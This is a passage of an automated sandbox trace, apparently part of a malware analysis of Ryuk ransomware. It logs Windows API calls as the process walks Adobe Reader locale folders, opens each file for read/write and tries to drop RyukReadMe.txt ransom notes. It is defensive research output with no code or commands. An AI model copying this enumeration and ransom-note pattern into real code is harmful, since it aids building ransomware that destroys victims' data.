hTemplateFile=0x0) returned 0xffffffffffffffff [0138.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.538] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.539] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.539] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\ReadOutLoud.DEU", dwFileAttributes=0x80) returned 0 [0138.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\ReadOutLoud.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\readoutloud.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.539] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.539] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\reflow.DEU", dwFileAttributes=0x80) returned 0 [0138.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\reflow.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\reflow.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.540] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.540] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\SaveAsRTF.DEU", dwFileAttributes=0x80) returned 0 [0138.540] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\SaveAsRTF.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\saveasrtf.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.540] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.541] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Search.DEU", dwFileAttributes=0x80) returned 0 [0138.541] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Search.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\search.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.541] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.541] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.541] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\SendMail.deu", dwFileAttributes=0x80) returned 0 [0138.541] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\SendMail.deu" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\sendmail.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.542] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.542] SetLastError (dwErrCode=0x0) [0138.542] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.542] GetLastError () returned 0x5 [0138.542] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.542] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.542] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.543] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.543] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.543] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\DEXShare.asfx", dwFileAttributes=0x80) returned 0 [0138.543] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.544] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.544] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\Services.asfx", dwFileAttributes=0x80) returned 0 [0138.544] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.544] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0138.545] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.545] SetLastError (dwErrCode=0x0) [0138.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.545] GetLastError () returned 0x5 [0138.545] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.545] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.545] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Spelling.DEU", dwFileAttributes=0x80) returned 0 [0138.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Spelling.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\spelling.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.546] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.546] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\updater.DEU", dwFileAttributes=0x80) returned 0 [0138.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\updater.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\updater.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.546] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.547] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Weblink.DEU", dwFileAttributes=0x80) returned 0 [0138.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Weblink.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\weblink.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.547] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.547] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.547] SetLastError (dwErrCode=0x0) [0138.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.548] GetLastError () returned 0x5 [0138.548] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.548] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.548] SetLastError (dwErrCode=0x0) [0138.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.548] GetLastError () returned 0x5 [0138.548] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.548] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.549] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.549] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.559] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.559] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.559] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.560] SetLastError (dwErrCode=0x0) [0138.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.560] GetLastError () returned 0x5 [0138.560] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.560] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.561] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.561] SetLastError (dwErrCode=0x0) [0138.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.561] GetLastError () returned 0x5 [0138.561] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.562] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.562] SetLastError (dwErrCode=0x0) [0138.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.562] GetLastError () returned 0x5 [0138.562] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.562] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.563] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.563] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.567] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.567] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.567] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.568] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.568] SetLastError (dwErrCode=0x0) [0138.568] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.568] GetLastError () returned 0x5 [0138.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.568] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.571] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.571] SetLastError (dwErrCode=0x0) [0138.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.571] GetLastError () returned 0x5 [0138.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.571] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.571] SetLastError (dwErrCode=0x0) [0138.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.571] GetLastError () returned 0x5 [0138.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.571] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.573] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.573] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.577] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.578] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.578] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.579] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.579] SetLastError (dwErrCode=0x0) [0138.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.579] GetLastError () returned 0x5 [0138.579] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.579] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.580] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.580] SetLastError (dwErrCode=0x0) [0138.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.580] GetLastError () returned 0x5 [0138.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.580] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.580] SetLastError (dwErrCode=0x0) [0138.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.580] GetLastError () returned 0x5 [0138.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.580] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.582] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.582] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.588] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.588] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.588] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.588] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.588] SetLastError (dwErrCode=0x0) [0138.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.589] GetLastError () returned 0x5 [0138.589] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 